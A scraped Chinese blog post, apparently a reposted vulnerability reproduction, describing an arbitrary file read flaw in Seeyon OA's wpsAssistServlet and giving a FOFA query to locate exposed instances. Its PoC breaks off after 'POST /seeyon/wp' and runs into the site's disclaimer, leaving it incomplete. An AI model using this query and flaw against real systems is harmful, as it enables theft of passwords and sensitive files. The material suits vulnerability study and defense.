热门标签
热门文章
- 1【Linux实践室】Linux 查询命令帮助语句(文末送书)
- 2MacBook如何通过键盘快捷键输入特殊字符_特殊符号_锐音符怎么打
- 3RxJava RxPermissions 动态权限 简介 原理 案例 MD
- 4机器学习如何帮助将芯片设计
- 5论文 | 自然语言处理顶会ACL 2018该关注什么?蚂蚁金服专家告诉你!
- 6手把手教你在本地电脑部署Stable Diffusion生成AI图像!无GPU也能跑图!_stable diffusion 本地部署
- 7鸿蒙OS元服务开发:【WebGL网页图形库开发概述】
- 8windows环境用GIT下载android源码_git 下载 libpng
- 9Windows11不插耳机、音箱提示无法找到输出设备的问题解决方法_win11声音无法找到输出设备
- 10Android9--SystemUI:(2)状态栏/导航栏 创建流程_systemui 导航栏
当前位置: article > 正文
致远互联-OA wpsAssistServlet 任意文件读取漏洞复现_致远oa wpsassistservlet 任意文件读取漏洞
作者:笔触狂放9 | 2024-04-08 21:29:46
赞
踩
致远oa wpsassistservlet 任意文件读取漏洞
0x01 产品简介
致远互联-OA 是数字化构建企业数字化协同运营中台,面向企业各种业务场景提供一站式大数据分析解决方案的协同办公软件。
0x02 漏洞概述
致远互联-OA wpsAssistServlet 存在任意文件读取漏洞,攻击者可读取系统密码等敏感信息进一步控制系统。
0x03 复现环境
FOFA:
body="/seeyon/USER-DATA/IMAGES/LOGIN/login.gif" || title="用友致远A" || (body="/yyoa/" && body!="本站内容均采集于") || header="path=/yyoa" || server=="SY8044" || (body="A6-V5企业版" && body="seeyon" && body="seeyonProductId") || (body="/seeyon/common/" && body="var _ctxpath = '/seeyon'") || (body="A8-V5企业版" && body="/seeyon/") || banner="Server: SY8044"
0x04 漏洞复现
PoC
POST /seeyon/wp声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/388332
推荐阅读
相关标签
